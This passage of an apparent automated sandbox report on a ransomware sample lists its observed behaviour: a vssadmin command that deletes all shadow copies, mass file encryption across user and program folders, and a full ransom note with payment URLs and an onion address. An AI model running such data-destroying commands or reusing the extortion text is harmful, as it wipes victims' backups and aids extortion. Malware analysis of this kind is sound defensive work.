successful installa
May disable shadow drive data (uses vssadmin)
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
Source: C:\Users\user\AppData\Roaming\svcmtr.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet Jump to behavior
May drop file containing decryption instructions (likely related to ransomware)
Source: 0t8amSU3vd.exeBinary or memory string: RESTORE_FILES.TXT
Source: 0t8amSU3vd.exeBinary or memory string: RESTORE_FILES.HTML
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: RESTORE_FILES.TXTopen\RESTORE_FILES.HTML
Source: 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RESTORE_FILES.TXTopen\RESTORE_FILES.HTML
Source: svcmtr.exeBinary or memory string: RESTORE_FILES.TXT
Source: svcmtr.exeBinary or memory string: RESTORE_FILES.HTML
Source: svcmtr.exe, 00000002.00000003.406909089.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000003.406909089.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000003.406909089.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000003.406909089.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000003.406909089.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RESTORE_FILES.TXTopen\RESTORE_FILES.HTML
Source: svcmtr.exe, 00000002.00000003.516398200.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000003.516398200.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000003.516398200.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000003.516398200.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000003.755279810.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000003.755279810.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000003.755279810.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000003.755279810.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.html
Source: svcmtr.exe, 00000002.00000002.876106236.0000000002D87000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: restore_files_gpmus.txt
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Users\user\Desktop\FENIVHOIKN.docxJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Users\user\Desktop\CURQNKVOIX.xlsxJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Users\user\Desktop\RAYHIWGKDI\CURQNKVOIX.xlsxJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Users\user\Desktop\FENIVHOIKN.pdfJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Users\user\Desktop\CURQNKVOIX\SUAVTZKNFL.pngJump to behavior
Moves / writes many txt or jpg files (may be a ransomware encrypting documents)
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Users\user\AppData\Local\Microsoft\Windows\Burn\Burn\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpgJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178523.JPGJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPGJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPGJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile moved: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382962.JPGJump to behavior
Writes a notice file (html or txt) to demand a ransom
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\aa2de5f4-12f7-4e24-86b2-9ea3afd5e638\restore_files_gpmus.html -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server!!!.</font><br><br><b><font class="ttl">what do i do?</b></font> <br><font style="font-size:13px;">alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> if you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b" target="_blank">http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b" target="_blank">http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b</a></b><br><Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\aa2de5f4-12f7-4e24-86b2-9ea3afd5e638\restore_files_gpmus.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.if you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1.http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b2.http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b3. https://zpr5huq4bgmutfnf.onion.to/e722d94c1cac34bif for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the address bar: zpr5huq4bgmutfnf.onionJump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\35\restore_files_gpmus.html -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server!!!.</font><br><br><b><font class="ttl">what do i do?</b></font> <br><font style="font-size:13px;">alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> if you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b" target="_blank">http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b" target="_blank">http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b</a></b><br><Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\35\restore_files_gpmus.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.if you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1.http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b2.http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b3. https://zpr5huq4bgmutfnf.onion.to/e722d94c1cac34bif for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the address bar: zpr5huq4bgmutfnf.onionJump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\35\9.47.0\restore_files_gpmus.html -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server!!!.</font><br><br><b><font class="ttl">what do i do?</b></font> <br><font style="font-size:13px;">alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> if you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b" target="_blank">http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b" target="_blank">http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b</a></b><br><Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\restore_files_gpmus.html -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server!!!.</font><br><br><b><font class="ttl">what do i do?</b></font> <br><font style="font-size:13px;">alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> if you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b" target="_blank">http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b" target="_blank">http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b</a></b><br><Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\restore_files_gpmus.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.if you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1.http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b2.http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b3. https://zpr5huq4bgmutfnf.onion.to/e722d94c1cac34bif for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the address bar: zpr5huq4bgmutfnf.onionJump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gdaefkejpgkiemlaofpalmlakkmbjdnl\restore_files_gpmus.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.if you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1.http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b2.http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b3. https://zpr5huq4bgmutfnf.onion.to/e722d94c1cac34bif for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the address bar: zpr5huq4bgmutfnf.onionJump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\$Recycle.Bin\S-1-5-21-966771315-3019405637-367336477-1001\restore_files_gpmus.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.if you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1.http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b2.http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b3. https://zpr5huq4bgmutfnf.onion.to/e722d94c1cac34bif for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the address bar: zpr5huq4bgmutfnf.onionJump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile dropped: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\restore_files_gpmus.html -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server!!!.</font><br><br><b><font class="ttl">what do i do?</b></font> <br><font style="font-size:13px;">alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> if you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b" target="_blank">http://aep554w4fm8j.fflroe598qu.com/e722d94c1cac34b</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b" target="_blank">http://aoei243548ld.keedo93i1lo.com/e722d94c1cac34b</a></b><br><Jump to dropped file
Writes many files with high entropy
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG entropy: 7.99498755716Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG entropy: 7.9939746792Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG entropy: 7.99907789331Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG entropy: 7.99793205067Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG entropy: 7.99855482405Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG entropy: 7.99812244886Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG entropy: 7.99826779297Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG entropy: 7.9986631482Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG entropy: 7.99615524232Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG entropy: 7.9960715748Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG entropy: 7.99555950859Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG entropy: 7.9933009054Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG entropy: 7.99346154842Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG entropy: 7.99398845138Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG entropy: 7.99457692256Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG entropy: 7.99335614851Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG entropy: 7.99304092425Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG entropy: 7.99584705514Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG entropy: 7.99583914772Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG entropy: 7.99637860205Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG entropy: 7.99187987277Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG entropy: 7.99141931749Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg entropy: 7.99978839619Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg entropy: 7.9996345211Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg entropy: 7.99976664486Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg entropy: 7.99975745316Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg entropy: 7.99962859933Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg entropy: 7.99981692554Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv entropy: 7.99999356046Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg entropy: 7.99972856389Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME01.CSS entropy: 7.99846981057Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME02.CSS entropy: 7.99816803998Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME03.CSS entropy: 7.99854133731Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME09.CSS entropy: 7.99853367769Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME10.CSS entropy: 7.99878340885Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME11.CSS entropy: 7.99874519912Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME12.CSS entropy: 7.99844522652Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME13.CSS entropy: 7.99856499915Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME04.CSS entropy: 7.99834570599Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME05.CSS entropy: 7.99862577944Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME06.CSS entropy: 7.99849409282Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME07.CSS entropy: 7.99853735073Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME08.CSS entropy: 7.99830826167Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME20.CSS entropy: 7.99850966224Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME21.CSS entropy: 7.99834186383Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS entropy: 7.99865503926Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS entropy: 7.99859273255Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME14.CSS entropy: 7.99837423835Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME15.CSS entropy: 7.99816329199Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME16.CSS entropy: 7.99859076703Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME17.CSS entropy: 7.99817283998Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME18.CSS entropy: 7.99872843695Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME19.CSS entropy: 7.99853816402Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME31.CSS entropy: 7.99827898335Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME32.CSS entropy: 7.99831007926Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME33.CSS entropy: 7.99851675108Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME24.CSS entropy: 7.99852672413Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME25.CSS entropy: 7.99857252149Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME26.CSS entropy: 7.99833876446Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME27.CSS entropy: 7.99825322135Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME28.CSS entropy: 7.99852619771Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME29.CSS entropy: 7.99866799757Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME30.CSS entropy: 7.99849458796Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME44.CSS entropy: 7.99878808928Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME42.CSS entropy: 7.99827717241Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME43.CSS entropy: 7.99847625719Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME34.CSS entropy: 7.99830785461Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME35.CSS entropy: 7.99871655061Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME36.CSS entropy: 7.99854234655Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME37.CSS entropy: 7.99864581495Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME38.CSS entropy: 7.99869433103Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME39.CSS entropy: 7.99836415506Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME40.CSS entropy: 7.99825910238Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME41.CSS entropy: 7.99858776273Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS entropy: 7.998399262Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME55.CSS entropy: 7.9984901335Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME53.CSS entropy: 7.99841576897Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME45.CSS entropy: 7.99844741889Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME46.CSS entropy: 7.99841106271Jump to dropped file
